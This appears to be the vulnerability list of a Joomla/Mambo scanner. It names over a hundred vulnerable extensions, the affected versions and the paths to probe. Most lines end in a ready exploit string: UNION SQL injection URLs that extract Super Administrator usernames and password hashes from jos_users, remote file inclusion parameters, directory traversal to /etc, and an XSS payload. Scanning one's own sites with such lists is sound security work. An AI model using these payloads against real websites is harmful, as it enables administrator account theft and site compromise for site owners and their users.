htaccess.txt has not been renamed. Versions affected: Any|/htaccess.txt|Generic defenses implemented in .htaccess are not available, so exploitation is more likely to succeed.
Unprotected Administrator directory Versions affected: Any|/administrator|The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Guessable Administrator directory Versions affected: Any|/admin|The guessable /admin directory is detected. Attackers can bruteforce administrator accounts. How to protect: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
be2004-2 a Joomla Template File Inclusion Vulnerability Versions affected: 2 and lower|/templates/be2004-2/|/templates/be2004-2/index.php?mosConfig_absolute_path=
AutoStand Category File Inclusion Vulnerability Versions affected: 1.0 and lower|/modules/mod_as_category.php|/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
A6MamboCredits File Inclusion Vulnerability Versions affected: Any|/components/com_a6mambocredits/|/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=
A6MamboHelpDesk File Inclusion Vulnerability Versions affected: Any Version|/components/com_a6mambohelpdesk/|/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
Quick Question module Versions affected: 4.5.1 and older|/modules/mod_quick_question.php|N/A
Advanced Poll Versions affected: 2.2.0 and older|/components/com_advancedpoll/|N/A
Akocomment Versions affected: Any Version|/components/com_akocomment/|N/A
Article File Inclusion Vulnerability Versions affected: 1.1 and older|/components/com_articles/|/components/com_articles/com_articles.php?absolute_path=
ArtLinks File Inclusion Vulnerability Versions affected: Any|/components/com_artlinks/|/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
MamCom (?) Versions affected: Any Version|/components/com_trade/|N/A
AutoStand Versions affected: 1.1 and older|/components/com_autostand/|N/A
Bayesian Naive Filter File Inclusion Vulnerability Versions affected: 1.1 and older|/components/com_bayesiannaivefilter/|/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
BigApe Backup File Inclusion Vulnerability Versions affected: Any Version|/components/com_babackup/|/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions affected: 2.2.1 and older|/components/com_bsqsitestats/|1) Input passed via the "HTTP Referer" header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in the context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quotes_gpc" is disabled.
Car Manager SQL Injection Vulnerability Versions affected: 1.1 and older|/components/com_resman/|/index.php?option=com_resman&task=moreinfo&id=-1+UNION+SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Classifieds Versions affected: 1.3 and older|/components/com_classifieds/|N/A
Colophon File Inclusion Vulnerability Versions affected: 1.2 and older|/components/com_colophon/|/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
Community Builder SQL Injection Vulnerability Versions affected: 1.0.0 and older|/components/com_profiler/|/index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Events Versions affected: 1.3 Beta and older|/components/com_events/|N/A
Expose Flash Gallery Versions affected: RC4 and older|/components/com_expose/|N/A
ExtCalendar XSS Vulnerability Versions affected: 0.9.1 and older|/components/com_extcalendar/|1) Input passed to the "month", "year", "prev", and "next" parameters in calendar.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 2) Input passed to the "Event title" field when adding a new event isn't properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in the context of an affected site when the malicious user data is viewed (e.g. when the administrator logs in).
Facile Forms Versions affected: 1.4.6 and older|/components/com_facileforms/|/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Galleria File Inclusion Vulnerability Versions affected: Any Version|/components/com_galleria/galleria.html.php|/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Gmaps SQL Injection Vulnerability Versions affected: 1.01 and older|/components/com_gmaps/|/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Hash Cash File Inclusion Vulnerability Versions affected: Any Version|/components/com_hashcash/server.php|/components/com_hashcash/server.php?mosConfig_absolute_path=
Hot Property Versions affected: 0.97 and older|/components/com_hotproperty/|N/A
JCE XSS+File Inclusion Vulnerability Versions affected: 1.0.4 and older|/components/com_jce/|1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.
JoomlaPack File Inclusion Vulnerability Versions affected: 1.0.4a2 RE and older|/components/com_jpack/|/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
JoomlaBoard File Inclusion Vulnerability Versions affected: 1.1.1 and older|/components/com_joomlaboard/|/components/com_joomlaboard/file_upload.php?sbp=
JoomlaLib Versions affected: 1.2.1 and older|/components/com_joomlalib/|N/A
JD-WordPress Versions affected: 1.0 RC2 and older|/components/com_jd-wp/|N/A
Fundraiser Versions affected: 0.0.0 and older|/components/com_fundraiser/|N/A
Marketplace SQL Injection Vulnerability Versions affected: 1.1.1-pl1 and older|/components/com_marketplace/|/index.php?option=com_marketplace&page=show_category&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
NeoReferences SQL Injection Vulnerability Versions affected: 1.3.1 and older|/components/com_neoreferences/|/index.php?option=com_neoreferences&Itemid=27&catid=99887766+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+where+user_id=1=1--
CHRONOContact File Inclusion Vulnerability Versions affected: N/A|/components/com_chronocontact/excelwriter/PPS/File.php|/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
MamboSPGM Versions affected: 1.4.1 and older|/components/com_mambospgm/|N/A
Ajax Chat Versions affected: 1.0.1 and older|/components/com_ajaxchat/|N/A
Joomla Cloner Versions affected: 1.6.1 and older|/components/com_cloner/|N/A
Quiz SQL Injection Vulnerability Versions affected: 0.81 and older|/components/com_quiz/|/index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
MCQuiz SQL Injection Vulnerability Versions affected: 0.9 and older|/components/com_mcquiz/|/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=42&tid=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
paxxgallery Blind SQL Injection Versions affected: 0.2 and older|/components/com_paxxgallery/|/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=-3333+and+substring(@@version,1,1)=5::/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333+and+substring(@@version,1,1)=6
pcchess File Inclusion Vulnerability Versions affected: 0.8 and older|/components/com_pcchess/include.pcchess.php|/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
xfaq SQL Injection Vulnerability Versions affected: 1.2 and older|/components/com_xfaq/|/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
rapidrecipe Remote SQL Injection Versions affected: 1.6.5 and older|/components/com_rapidrecipe/|/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_doc SQL Injection Vulnerability Versions affected: Any Version|/components/com_doc/|/index.php?option=com_doc&task=view&sid=-1+UNION+SELECT+1,1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,5,6,7,8,password,username,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Unknown name: com_noticias SQL Injection Vulnerability Versions affected: Any Version|/components/com_noticias/|index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766+UNION++SELECT+0,concat(username,0x3a,password,0x3a,email),2,3,4,5++FROM++jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
NeoGallery SQL Injection Vulnerability Versions affected: Any Version|/components/com_neogallery/|/index.php?option=com_neogallery&task=show&Itemid=5&catid=999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Ynews SQL Injection Vulnerability Versions affected: 1.0.0 and older|/components/com_ynews/|/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+UNION+SELECT+0,1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
jooget SQL Injection Vulnerability Versions affected: 2.6.8 and older|/components/com_jooget/|/index.php?option=com_jooget&Itemid=61&task=detail&id=-1+UNION+SELECT+0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
MediaSlide Versions affected: 0.5.0 and older|/components/com_mediaslide/|Compare the content length of /index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1 and /index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0
Rssxt Versions affected: 1.0 and older|/components/com_rssxt/|N/A
D4JeZine Versions affected: 2.8 and older|/components/com_ezine/|N/A
ProductShowcase SQL Injection Versions affected: 1.5 and older|/components/com_productshowcase/|/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Candle SQL Injection Versions affected: 1.0.0 and older|/components/com_candle/|/index.php?option=com_candle&task=content&cID=-9999+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
simple shop SQL Injection Versions affected: 2.0 and older|/components/com_simpleshop/|/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
hwdVideoShare SQL Injection Versions affected: 1.1.1 and older|/components/com_hwdvideoshare/|/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999+UNION+SELECT+000,111,222,333,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Clasifier SQL Injection Versions affected: 0.9 and older|/components/com_clasifier/|/index.php?option=com_clasifier&Itemid=61&cat_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
PC CookBook SQL Injection Vulnerability Versions affected: 1.3 and older|/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
astatsPRO SQL Injection Vulnerability Versions affected: 1.0.0 and older|/components/com_astatspro/|/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_galeria SQL Injection Vulnerability Versions affected: Any Version|/components/com_galeria/|/index.php?option=com_galeria&Itemid=61&func=detail&id=-999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,7+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Limbo File Manager Component Versions affected: 1.0.4 and older|/components/com_fm/fm.install.php|/components/com_fm/fm.install.php?lm_absolute_path=
Serverstat File Inclusion Vulnerability Versions affected: 0.4.4 and older|/components/com_serverstat/install.serverstat.php|/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Com Profiler Blind SQL Injection Versions affected: 1.0 RC2 and older|/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=5::/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=6
Crop Image File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_cropimage/admin.cropcanvas.php|/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Mambatstaff File Inclusion Vulnerability Versions affected: 3.1b and older|/components/com_mambatstaff/mambatstaff.php|/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
Loudmouth Versions affected: 4.0j and older|/components/com_loudmouth/|N/A
PhpBB Component Versions affected: 1.2.4RC3 and older|/components/com_forum/|/components/com_forum/download.php?phpbb_root_path=
Kochsuite File Inclusion Vulnerability Versions affected: 0.9.4 and older|/components/com_kochsuite/|/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
Remository File Inclusion Vulnerability Versions affected: 3.25 and older|/components/com_remository/admin.remository.php|/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Tosmo Mambo Versions affected: 4.0.13a and older|/components/com_minibb/|/components/minibb/index.php?absolute_path=
Mam - Moodle File Inclusion Vulnerability Versions affected: Any Version|/components/com_moodle/moodle.php|/components/com_moodle/moodle.php?mosConfig_absolute_path=
Coppermine Photo Gallery File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_cpg/cpg.php|/components/com_cpg/cpg.php?mosConfig_absolute_path=
Php Shop File Inclusion Vulnerability Versions affected: 1.2 RC2b and older|/components/com_phpshop/toolbar.phpshop.html.php|/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
MamboWiki File Inclusion Vulnerability Versions affected: 0.9.6 and older|/components/com_mambowiki/MamboLogin.php|/components/com_mambowiki/MamboLogin.php?IP=
Lurm Constructor File Inclusion Vulnerability Versions affected: 0.6b and older|/components/com_lurm_constructor/admin.lurm_constructor.php|/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
FlippingBook SQL Injection Versions affected: 1.0.4 and older|/components/com_flippingbook/|/index.php?option=com_flippingbook&Itemid=28&book_id=null+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
eXtplorer Local Directory Traversal Versions affected: 2.0.0 RC2 and older|/components/com_extplorer/|/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
joomlaXplorer Local Directory Traversal Versions affected: 1.6.2 and older|/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
joomlaXplorer XSS Versions affected: 1.6.2 and older|/components/com_joomlaxplorer|/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Online FlashQuiz Remote File Inclusion Versions affected: 1.0.2 and older|/components/com_onlineflashquiz/|/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
actualite SQL Injection Versions affected: 1.0 and older|/components/com_actualite/|/index.php?option=com_actualite&task=edit&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
myalbum SQL Injection Versions affected: 1.0 and older|/components/com_myalbum/|/index.php?option=com_myalbum&album=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
alphacontent SQL Injection Versions affected: 2.5.8 and older|/components/com_alphacontent/|/index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999+UNION+SELECT+1,concat(username,0x3e,password),3,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,39+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Cinema SQL Injection Versions affected: 1.0 and older|/components/com_cinema/|/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999+UNION+SELECT+0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
D3000 SQL Injection Versions affected: 1.0.0 and older|/components/com_d3000/|/index.php?option=com_d3000&task=showarticles&id=-99999+UNION+SELECT+0,username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
rekry SQL Injection Versions affected: 1.0.0 and older|/components/com_rekry/|/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+limit+1,1--
custompages Remote File Inclusion Versions affected: 1.1 and older|/components/com_custompages/|/index.php?option=com_custompages&cpage=
Restaurante File Upload Vulnerability Versions affected: 1.0 and older|/components/com_restaurante/|/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Alberghi SQL Injection Versions affected: 2.1.3 and older|/components/com_alberghi/|/index.php?option=com_alberghi&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
joovideo SQL Injection Versions affected: 1.2.2 and older|/components/com_joovideo/|/index.php?option=com_joovideo&Itemid=1&task=detail&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Acajoom SQL Injection Vulnerability Versions affected: 1.1.5 and older|/components/com_acajoom/|/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+LIMIT+1,1--
jReviews Versions affected: Any Version|/components/com_jreviews/scripts/xajax.inc.php|/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=
BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions affected: 1.8.0 and older|/components/com_bsq_sitestats/|1) Input passed via the "HTTP Referer" header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in the context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quotes_gpc" is disabled.
Madeira Versions affected: Any Version|/components/com_madeira/img.php|/components/com_madeira/img.php?url=
Mambo eMail Publisher File Inclusion Vulnerability Versions affected: 1.2 and older|/components/com_mmp/help.mmp.php|/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
Extended Registration File Inclusion Vulnerability Versions affected: 4.1 and older|/components/com_extended_registration/registration_detailed.inc.php|/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
OpenSEF Versions affected: 2.0.0 RC5 Unpatched and older [OR] joomSEF (ARTIO) Versions affected: 2.2.1 and older [OR] sh404SEF Versions affected: 1.2.4 w and older|/components/com_sef/|N/A
Multibanners File Inclusion Vulnerability Versions affected: Any Version|/components/com_multibanners/extadminmenus.class.php|/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
MoSpray File Inclusion Vulnerability Versions affected: 1.8 RC1 and older|/components/com_mospray/scripts/admin.php|/components/com_mospray/scripts/admin.php?basedir=
MosMedia File Inclusion Vulnerability Versions affected: 1.0.8 and older|/components/com_mosmedia/|/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
Mos Tree File Inclusion Vulnerability Versions affected: 1.58 and older|/components/com_mtree/|/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
Mambo Gallery Manager (com_mgm) File Inclusion Vulnerability Versions affected: Any Version|/components/com_mgm/|/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
MambelFish File Inclusion Vulnerability Versions affected: 1.x and older|/components/com_mambelfish/|/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
LMO File Inclusion Vulnerability Versions affected: 1.0b2 and older|/components/com_lmo/|/components/com_lmo/lmo.php?mosConfig_absolute_path=
Link Directory File Inclusion Vulnerability Versions affected: Any Version|/components/com_linkdirectory/|/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
Letterman Versions affected: 1.2.4 and older|/components/mod_letterman/|N/A
JIM File Inclusion Vulnerability Versions affected: 1.0.1 and older|/components/com_jim/|/components/com_jim/install.jim.php?mosConfig_absolute_path=
JD-Wiki File Inclusion Vulnerability Versions affected: Any Version|/components/com_jd-wiki/|/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
Joomla Visites Remote File Inclusion Vulnerability Versions affected: 1.1 RC2 and older|/components/com_joomla-visites/|/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
JPad SQL Injection Vulnerability Versions affected: 1.0 and older|/components/com_jpad/|/index.php?option=com_jpad&task=edit&Itemid=39&cid=-1+UNION+ALL+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Filiale SQL Injection Versions affected: 1.0.4 and older|/components/com_filiale/|/index.php?option=com_filiale&idFiliale=-5+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Pony Gallery SQL Injection Vulnerability Versions affected: 1.5 and older|/components/com_ponygallery/|/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Joomla Radio 5 File Inclusion Vulnerability Versions affected: 5.0 and older|/components/com_joomlaradiov5/|/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
Flash Slide Show Gallery File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_slideshow/|/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
zOOm Media Gallery File Inclusion Vulnerability Versions affected: 2.5.1 RC4 and older|/components/com_zoom/classes/|/components/com_zoom/classes/database.php?mosConfig_absolute_path=
VirtueMart Versions affected: 1.0.11 and older|/components/com_virtuemart/|N/A
User Home Pages 2 File Inclusion Vulnerability Versions affected: 1.1.1 and older|/components/com_uhp2/|/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=
User Home Pages 1 File Inclusion Vulnerability Versions affected: 1.1.1 and older|/components/com_uhp/|/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
TaskHopper File Inclusion Vulnerability Versions affected: 1.1 and older|/components/com_thopper/|/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
Security Images File Inclusion Vulnerability Versions affected: 3.0.5 and older|/components/com_securityimages/|/components/com_securityimages/lang.php?mosConfig_absolute_path=
Site Map File Inclusion Vulnerability Versions affected: Any Version|/components/com_sitemap/|/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
SimpleBoard Script Insertion File Inclusion Vulnerability Versions affected: Any Version|/components/com_simpleboard/|/components/com_simpleboard/file_upload.php?sbp=
SMF Bridge File Inclusion Vulnerability Versions affected: 1.1.4 and older|/components/com_smf/|/components/com_smf/smf.php?mosConfig_absolute_path=
RWCards SQL Injection Vulnerability Versions affected: 2.4.4 and older|/components/com_rwcards/|/index.php?option=com_rwcards&task=listCards&category_id=-1'UNION+SELECT+1,2,03,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),50,044,076,0678,07+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
RS Gallery2 SQL Injection Vulnerability Versions affected: 1.11.3 and older|/components/com_rsgallery2/|/index.php?option=com_rsgallery2&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
PollXT File Inclusion Vulnerability Versions affected: 1.22.07 and older|/components/com_pollxt/|/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
People Book File Inclusion Vulnerability Versions affected: 1.1.5 and older|/components/com_peoplebook/param.peoplebook.php|/components/com_peoplebook/param.peplebook.php?mosConfig_absolute_path=
Phil-A-Form Versions affected: 1.2 and older|/components/com_philaform/|N/A
Per Forms File Inclusion Vulnerability Versions affected: v1_beta and older|/components/com_performs/|/components/com_performs/performs.php?mosConfig_absolute_path
Webmaster Tips Portfolio File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
WmT Advanced Flash Gallery File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_wmtgallery/|/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
Flash Panoramic View File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_panoramic/|/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
MamboXChange VideoDB File Inclusion Vulnerability Versions affected: 0.3en and older|/components/com_videodb/core/videodb.class.xml.php|/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
HTMLArea3 addon - ImageManager File Inclusion Vulnerability Versions affected: 1.5 and older|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
Calendar Versions affected: 1.5.7 and older|/components/com_calendar/|N/A
NFN Address Book Versions affected: 0.4 and older|/components/com_nfn_addressbook/|N/A
X-Shop Versions affected: 1.7 and older|/components/com_x-shop/|N/A
Tour de France Pool Versions affected: 1.0.1 and older|/components/com_tour_toto/|N/A
SWmenu File Inclusion Vulnerability Versions affected: 4.0 and older|/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
Nice Talk SQL Injection Vulnerability Versions affected: 0.9.3 and older|/components/com_nicetalk/|/index.php?option=com_nicetalk&tagid=-2)+UNION+SELECT+1,2,3,4,5,6,7,8,0,999,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),777,666,555,444,333,222,111+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
